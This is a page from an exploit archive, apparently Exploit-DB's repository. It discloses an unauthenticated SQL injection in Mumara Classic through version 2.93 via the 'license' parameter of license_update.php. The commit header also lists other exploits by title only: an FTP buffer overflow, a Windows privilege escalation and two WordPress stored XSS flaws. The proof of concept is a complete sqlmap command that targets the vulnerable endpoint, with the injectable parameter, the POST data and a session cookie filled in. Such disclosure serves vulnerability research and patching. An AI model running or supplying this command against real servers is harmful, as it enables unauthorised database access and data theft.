a7e24bac97
5 changes to exploits/shellcodes Xlight FTP 3.9.3.1 - Buffer Overflow (PoC) Windows MultiPoint Server 2011 SP1 - RpcEptMapper and Dnschade Local Privilege Escalation WordPress Plugin WP Symposium Pro 2021.10 - 'wps_admin_forum_add_name' Stored Cross-Site Scripting (XSS) WordPress Plugin AccessPress Social Icons 1.8.2 - 'icon title' Stored Cross-Site Scripting (XSS) Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
18 lines
No EOL
652 B
Text
18 lines
No EOL
652 B
Text
# Exploit Title: Mumara Classic 2.93 - 'license' SQL Injection (Unauthenticated)
|
|
# Date: 2021-11-11
|
|
# Exploit Author: (v0yager) Shain Lakin
|
|
# Vendor Homepage: https://mumara.com
|
|
# Version: <= 2.93
|
|
# Tested on: CentOS 7
|
|
|
|
-==== Vulnerability ====-
|
|
|
|
An SQL injection vulnerability in license_update.php in Mumara Classic
|
|
through 2.93 allows a remote unauthenticated attacker to execute
|
|
arbitrary SQL commands via the license parameter.
|
|
|
|
-==== POC ====-
|
|
|
|
Using SQLMap:
|
|
|
|
sqlmap -u https://target/license_update.php --method POST --data "license=MUMARA-Delux-01x84ndsa40&install=install" -p license --cookie="PHPSESSID=any32gbaer3jaeif108fjci9x" --dbms=mysql |